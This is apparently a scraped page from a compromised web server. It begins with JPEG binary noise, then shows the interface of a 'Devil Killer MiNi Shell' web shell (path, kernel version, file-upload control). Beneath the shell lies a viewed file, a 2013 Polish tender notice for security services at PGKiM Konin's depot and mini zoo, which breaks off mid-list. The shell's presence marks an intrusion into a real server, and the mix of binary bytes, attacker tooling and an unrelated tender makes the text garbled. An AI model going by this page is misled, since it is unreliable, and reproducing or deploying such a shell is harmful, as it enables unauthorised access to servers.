JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130124/34088-N-2013.html

<p class="kh_header"><b>Konin: Ochrona obiektów i mienia PGKiM Sp. z o.o. przy
ul. M. Dąbrowskiej 8 w Koninie 
oraz
Ochrona Mini ZOO w Parku im. F. Chopina w Koninie,                         ul. Kościuszki wraz z wyposażeniem, inwentarzem                                  i zwierzętami.
Ochrona obiektów, urządzeń na terenie parku im. F. Chopina. Ochrona przed kradzieżą i dewastacją budynków , obiektów                 i placów posesji przy ul. R. Dmowskiego 2 w Koninie</b><br>
<b>Numer ogłoszenia: 34088 - 2013; data zamieszczenia: 24.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Spółka z ograniczoną odpowiedzialnością , ul. M. Dąbrowskiej 8, 62-500 Konin, woj. wielkopolskie, tel. 063 2428276, faks 063 2428224.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkim.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona obiektów i mienia PGKiM Sp. z o.o. przy
ul. M. Dąbrowskiej 8 w Koninie 
oraz
Ochrona Mini ZOO w Parku im. F. Chopina w Koninie,                         ul. Kościuszki wraz z wyposażeniem, inwentarzem                                  i zwierzętami.
Ochrona obiektów, urządzeń na terenie parku im. F. Chopina. Ochrona przed kradzieżą i dewastacją budynków , obiektów                 i placów posesji przy ul. R. Dmowskiego 2 w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I: Ochrona obiektów i mienia PGKiM Sp. z o.o. przy ul. M Dąbrowskiej 8 w Koninie:
Ochrona budynków, urządzeń, terenów oraz samochodów, maszyn i urządzeń zaplecza technicznego (bazy) Zamawiającego zlokalizowanej przy ul. M. Dąbrowskiej 8 w Koninie w formie aktywnej obecności jednego pracownika ochrony:
- w dni powszednie, soboty, niedziele oraz święta i dni wolne od pracy od godz. 07:00 do godz. 07:00 dnia następnego. oraz psa obronnego - stróżującego na terenie chronionym w czasie całodobowym.
Część II: Ochrona Mini ZOO w Parku im. F. Chopina w Koninie, ul. Kościuszki wraz z wyposażeniem, inwentarzem i zwierzętami. Ochrona obiektów, urządzeń na terenie parku im. F. Chopina. Ochrona przed kradzieżą i dewastacją budynków, obiektów i placów posesji przy ul. R. Dmowskiego 2 w Koninie:
- w dni powszednie, soboty, niedziele oraz święta i dni wolne od pracy od godz. 15:00 do godz. 07:00 dnia następnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 15.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I i II: Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że posiada aktualną koncesję Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie wykonywania usług ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I i II: Zamawiający nie opisał sposobu oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I i II: Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował odrębnymi, niezależnymi środkami łączności tj. aktywne radiotelefony min 2 szt. na jednej zmianie, min jeden aktywny aparat telefonii komórkowej do nawiązania łączności z wyznaczonymi służbami Zamawiającego, w które będą wyposażeni pracownicy przewidziani do realizacji zamówienia oraz środkami transportu tj. min jeden samochód, w jaki będzie wyposażona grupa interwencyjna, wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I i II: Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że: 1) dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk jakie zostaną im powierzone, tj.: dysponują lub będą dysponować min. czterema pracownikami posiadającymi aktualną licencję pracownika ochrony fizycznej I lub II stopnia, 2) dysponują lub będą dysponować dwuosobową grupą interwencyjną zdolną do podjęcia działań na terenie chronionego obiektu w czasie max 15 min od chwili zaistnienia zdarzenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I i II: zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 200 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty - Załącznik nr 1 do SIWZ; 2. Informacja o zakresie powierzonej usługi - zgodnie z Załącznikiem nr 8; 3. Informacja o Wykonawcach wspólnie ubiegających się o udzielenie zamówienia - zgodnie z Załącznikiem nr 9; 4. Oryginał lub notarialnie potwierdzona kserokopia pełnomocnictwa dla osoby lub osób podpisujących ofertę, upoważnionych do składania woli i do podejmowania zobowiązań w imieniu Wykonawcy, jeżeli upoważnienie takie nie wynika z dokumentów rejestrowych działalności. Pełnomocnictwo winno jednoznacznie wskazywać osobę lub osoby pełnomocnika poprzez wskazanie jego podstawowych danych identyfikacyjnych - Załącznik nr 10</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy w następującym przypadku: a) zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej: - o charakterze niezależnym od stron; - którego strony nie mogły przewidzieć przed zawarciem umowy; - którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności; - której nie można przypisać drugiej stronie; Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, promieniowanie lub skażenia; b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron; c) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i sprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; d) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji Umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgkim.konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGKiM Sp. z o.o. w Koninie, ul. M. Dąbrowskiej 8, 62-500 Konin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2013 godzina 09:30, miejsce: PGKiM Sp. z o.o. w Koninie, ul. M. Dąbrowskiej 8, 62-500 Konin, pok. nr 119.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ochrona obiektów i mienia PGKiM Sp. z o.o. przy ul. M. Dąbrowskiej 8 w Koninie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochrona obiektów i mienia PGKiM Sp. z o.o. przy ul. M Dąbrowskiej 8 w Koninie:
1. Ochrona budynków, urządzeń, terenów oraz samochodów, maszyn i urządzeń zaplecza technicznego (bazy) Zamawiającego zlokalizowanej przy ul. M. Dąbrowskiej 8 w Koninie w formie aktywnej obecności jednego pracownika ochrony:
- w dni powszednie, soboty, niedziele oraz święta i dni wolne od pracy od godz. 07:00 do godz. 07:00 dnia następnego. oraz psa obronnego - stróżującego na terenie chronionym w czasie całodobowym.
Ochroną objęte są obiekty znajdujące się na:
a) Terenie ogrodzonej bazy przy ul. M. Dąbrowskiej 8 w Koninie: zaplecze kuchenne stołówki, budynki usługowo-naprawcze, garaże, stolarnia, myjnia kryta, zbiornik paliwowy portiernia, wiata samochodowa i magazynowa, drogi wewnętrzne i place manewrowe, plac magazynowy i parking wewnętrzny;
b) Poza terenem wygrodzonym przy ul. M. Dąbrowskiej 8 w Koninie: budynek biurowca i sali konsumpcyjnej stołówki.
2. Podstawowy zakres ochrony obejmuje:
- punktualne rozpoczynanie pracy przez pracownika ochrony;
- ochronę przed włamaniem do obiektów objętych ochroną, a w szczególności:
a) ustalenie uprawnień do przebywania na obszarach lub w obiektach chronionych oraz legitymowania osób, w celu ustalenia ich tożsamości,
b)wezwania osób do opuszczenia obszaru lub obiektu w przypadku stwierdzonego
braku uprawnień do przebywania na terenie chronionego obszaru lub obiektu albo
stwierdzenia zakłócenia porządku;
- przeciwdziałanie aktom przestępczym, a w szczególności:
a) stosowanie środków przymusu bezpośredniego, w przypadku zagrożenia dóbr
powierzonych ochronie,
b) ujecie osób stwarzających w sposób oczywisty bezpośrednie zagrożenie dla
- ochrona majątku trwałego znajdującego się wewnątrz obiektów;
- systematyczne sprawdzanie stanu technicznego ogrodzenia, kontrola obiektów, a w szczególności stanu zamknięcia okien, drzwi i bram;
- stała obserwacja obiektów i urządzeń objętych ochroną;
- stała kontrola zabezpieczeń elektronicznych i mechanicznych obiektu;
- stała kontrola oświetlenia zewnętrznego obiektu oraz jego ogrodzenia;
- stała kontrola stanu zagrożenia pożarowego, a w przypadku zaistnienia zdarzenia powiadomienie Państwowej Straży Pożarnej w czasie nie dłuższym niż 3 min. Wykonawca ponosi odpowiedzialność za skutki jaki mogą wyniknąć z powodu opóźnienia reakcji na zdarzenie;
- stały kontakt z kierownictwem Zamawiającego lub osobą przez niego upoważnioną;
- stały kontakt z dowódcą zabezpieczenia obiektu;
- prowadzenie dozoru nad pracą podległych pracowników;
- kontrola ruchu samochodowego i towarowego na terenie obiektu chronionego;
- odnotowywanie ruchu pojazdów wjeżdżających i wyjeżdżających z siedziby Spółki przez bramę przy portierni w książce dyżurów;
- przeprowadzanie szczegółowej kontroli pojazdów w zakresie transportu ładunków na teren bazy i wywożonych ładunków z terenu bazy przez przewoźników zewnętrznych oraz pojazdy Zamawiającego. Wyniki kontroli należy odnotowywać w książce dyżurów;
- uruchamianie procedur alarmowych w sytuacji zagrożenia;
- informowanie kierownictwa Zamawiającego lub osobę przez niego upoważnioną o powstałych nieprawidłowościach;
- zabezpieczania śladów stwierdzonych przestępstw przeciw mieniu i ludziom;
- w przypadku zaistnienia włamania, kradzieży lub dewastacji natychmiastowe zawiadamianie policji;
- po godzinie 15:00 (z wyjątkiem poniedziałku - po godzinie 16:00) sprawdzanie zamknięć obiektów i pojazdów pozostawionych na terenie chronionym, a w przypadku stwierdzenia włamania, kradzieży, dewastacji mienia, itp. niezwłoczne powiadamianie Kierownictwa Spółki oraz Policji;
- podejmowanie działań w przypadku zakłóceń porządku własnymi grupami interwencyjnymi - czas reakcji do 5 minut (o ile nie wystąpią uzasadnione przeszkody wydłużające ten czas) lub za pomocą wezwanych stosownych organów;
- znajomość położenia głównego wyłącznika energii elektrycznej i zasilania w wodę;
- telefoniczne powiadamianie wyznaczonych pracowników Zamawiającego o wystąpienia opadów śniegu lub gołoledzi oraz o zgłoszonych awariach w budynkach administrowanych przez Spółkę;
- prowadzenie książki dyżurów, m.in. dokonywanie wpisu dotyczącego faktu przebywania pracowników Zamawiającego oraz pracowników firm podnajmujących lokale po godzinach pracy, odnotowywanie wszelkich zdarzeń na terenie obiektu;
- przeprowadzanie obchodów chronionego terenu w jednogodzinnych odstępach w godz. od 16:00 do 06:00 dnia następnego oraz w dni świąteczne i wolne od pracy przez całą dobę w godzinnych odstępach;
- wpisywanie do książki dyżurów częstotliwości i czasu trwania obchodów dziennych, ciągłości patroli nocnych oraz wszelkich zaistniałych zdarzeń, uwag dotyczących np. niewłaściwego zabezpieczenia obiektu, awarii, oświetlenia instalacji alarmowej, elektrycznej, wodociągowo-kanalizacyjnej, uszkodzeń ogrodzenia, wybicia szyb, braku plomb, nie zamkniętych okien, drzwi, itp.;
- przedkładanie osobie upoważnionej książki dyżurów z wpisanymi uwagami i spostrzeżeniami z pełnienia służby, codziennie rano do godz. 08:00;
- przestrzeganie tajemnicy dotyczącej chronionego obiektu, a także innych informacji, których ujawnienie mogłoby mieć wpływ na bezpieczeństwo chronionego mienia;
- w czasie wykonywania obowiązków ochrony pracownicy zobowiązani są do noszenia umundurowania z widocznym logiem firmy Wykonawcy sprawującego ochronę i wyposażenia w dopuszczalne środki ochrony fizycznej;
- przestrzeganie zasad należytego zachowania się podczas wykonywania powierzonych obowiązków, a przede wszystkim uprzejme odnoszenie się do interesantów oraz pracowników zatrudnionych na terenie chronionego obiektu;
- w czasie pełnienia dyżuru pracownicy Wykonawcy nie mogą nawiązywać kontaktów towarzyskich z osobami postronnymi oraz obowiązuje zakaz przebywania osób postronnych na terenie portierni;
- w godzinach od 22:00 do 06:00 dokonywanie patroli prewencyjnych przez grupy interwencyjne;
- w okresie występowania gołoledzi w godzinach określonych w pkt 1 posypywanie powierzchni chodnika piaskiem i solą przed budynkiem biurowca, portierni oraz chodnika przy drodze wjazdowej na teren bazy i dojść do budynków wraz z schodami (piasek i sól dostarcza Zamawiający);
- wydawanie pracownikom Spółki kluczy do poszczególnych pomieszczeń biurowych przed godziną  07:00;
- utrzymanie ładu i porządku w pomieszczeniu portierni oraz na terenie wokół portierni;
- nie wpuszczanie na teren obiektu chronionego osób, gdy zachodzi podejrzenie na stan wskazujący spożycie alkoholu;
- zatrzymywanie osób opuszczających teren chroniony, gdy zachodzi podejrzenie na stan wskazujący spożycie alkoholu, sporządzenie pisemnego meldunku, niezwłoczne powiadomienie uprawnionych osób Zamawiającego celem podjęcia decyzji o dalszym postępowaniu;
- każda ze zmian prowadzona jest przez wyznaczonego imiennie pracownika, który odpowiada za całokształt służby na zmianie;
- pracownikom służby ochrony mienia w czasie służby zabrania się:
a) spać w czasie pełnienia służby,
b) schodzić z posterunku bez ważnej przyczyny,
c) spożywać alkoholu pod jakąkolwiek postacią lub być pod jego wpływem,
d) pozostawiać portiernię bez opieki i ewentualnego zamknięcia,
e) używać telefonów do celów innych niż służbowe,
f) wykonywać inne czynności, które mogłyby osłabić czujność  i wpłynąć ujemnie na
jakość pełnionej służby;
- pracownicy służby ochrony mienia  w czasie służby zobowiązani są do:
a) dbania o wygląd zewnętrzny oraz właściwego zachowania na służbie,
b) stosowania się do poleceń osoby z ramienia Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ochrona Mini ZOO w Parku im. F. Chopina w Koninie, ul. Kościuszki wraz z wyposażeniem, inwentarzem i zwierzętami. Ochrona obiektów, urządzeń na terenie parku im. F Chopina. Ochrona przed kradzieżą i dewastacją budynków , obiektów i placów posesji przy ul. R Dmowskiego 2 w Koninie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochrona Mini ZOO w Parku im. F. Chopina w Koninie, ul. Kościuszki wraz z wyposażeniem, inwentarzem i zwierzętami. Ochrona obiektów, urządzeń na terenie parku im. F. Chopina. Ochrona przed kradzieżą i dewastacją budynków, obiektów i placów posesji przy ul. R. Dmowskiego 2 w Koninie
- w dni powszednie, soboty, niedziele oraz święta i dni wolne od pracy od godz. 15:00 do godz. 07:00 dnia następnego.
Do podstawowych obowiązków Wykonawcy należy:
- organizowanie i kierowanie ochroną obiektów;
- dokonywanie kontroli pracy dozoru w różnych porach dnia i nocy;
- prowadzenie dozoru nad pracą podległych sobie pracowników;
- podejmowanie wszelkich dostępnych działań na rzecz doskonalenia systemu zabezpieczenia obiektów;
